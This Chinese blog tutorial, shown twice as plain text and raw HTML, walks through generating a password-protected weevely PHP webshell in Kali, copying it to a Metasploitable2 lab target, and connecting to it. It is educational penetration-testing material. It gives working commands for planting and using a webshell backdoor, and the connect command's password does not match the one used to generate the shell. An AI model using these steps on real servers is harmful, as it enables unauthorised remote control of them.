kali下的中国菜刀

博主： literature
发布时间：2018 年 05 月 04 日
187 次浏览
关闭评论
616字数
分类：主机教程

weevely 是kali中的php webshell 工具。但相较于 webacoo ，weevely 的功能更加强大，同时对于webshell的连接设立了密码选项！并且携带了大量的管理模块，为渗透带来了更多的惊喜与便利！下面我们来实例演示， weevely 的具体使用。

准备环境：

kali linux
Metasploitables2

首先还是先制作一个 webshell ,密码为 bbskali

weevely generate bbskali secist.php

可以看到，很快就为我们生成了一个大小1000多字节的 webshell 。

我们使用 cat 命令简单查看下 webshell 的内容：

cat /usr/share/weevely/secist.php

现在我将生成的 webshell 远程拷贝到目标机器上：

scp /usr/share/weevely/secist.php [email protected]:/home/msfadmin

或者上传PHP木马

连接一句话木马

weevely http://192.168.30.128/secist.php secist

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/87.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

最后修改：2023 年 08 月 04 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

此处评论已关闭

kali下的中国菜刀

literature • 2018 年 05 月 04 日

<p>weevely 是kali中的php webshell 工具。但相较于 webacoo ，weevely 的功能更加强大，同时对于webshell的连接设立了密码选项！并且携带了大量的管理模块，为渗透带来了更多的惊喜与便利！下面我们来实例演示， weevely 的具体使用。</p><h3>准备环境：</h3><ul>
 <li>kali linux</li>
 <li>Metasploitables2</li>
</ul><p>首先还是先制作一个 webshell ,密码为 bbskali</p><pre><code class="lang-shell">weevely generate bbskali secist.php</code></pre><p>可以看到，很快就为我们生成了一个大小1000多字节的 webshell 。<br /><img src="http://www.secist.com/wp-content/uploads/2016/10/20161014185456.png" alt="" title="" style="" class="aligncenter"style=""><br />我们使用 cat 命令简单查看下 webshell 的内容：</p><pre><code class="lang-shell">cat /usr/share/weevely/secist.php</code></pre><p><img src="http://www.secist.com/wp-content/uploads/2016/10/20161014185525.png" alt="请输入图片描述" title="请输入图片描述" style="" class="aligncenter"style=""><br />现在我将生成的 webshell 远程拷贝到目标机器上：</p><pre><code class="lang-shell">scp /usr/share/weevely/secist.php msfadmin@192.168.30.128:/home/msfadmin</code></pre><p>或者上传PHP木马</p><h3>连接一句话木马</h3><pre><code class="lang-shell">weevely http://192.168.30.128/secist.php secist</code></pre><p><img src="http://www.secist.com/wp-content/uploads/2016/10/20161014190249.png" alt="" title="" style="" class="aligncenter"style=""></p><p><img src="https://blog.bbskali.cn/usr/uploads/2018/05/913194665.png" alt="" title="" style="" class="aligncenter"style=""></p><p><hr class="content-copyright" style="margin-top:50px"></p><div class="post-copyright" style="font-style:normal"><p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：https://blog.bbskali.cn/87.html</p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>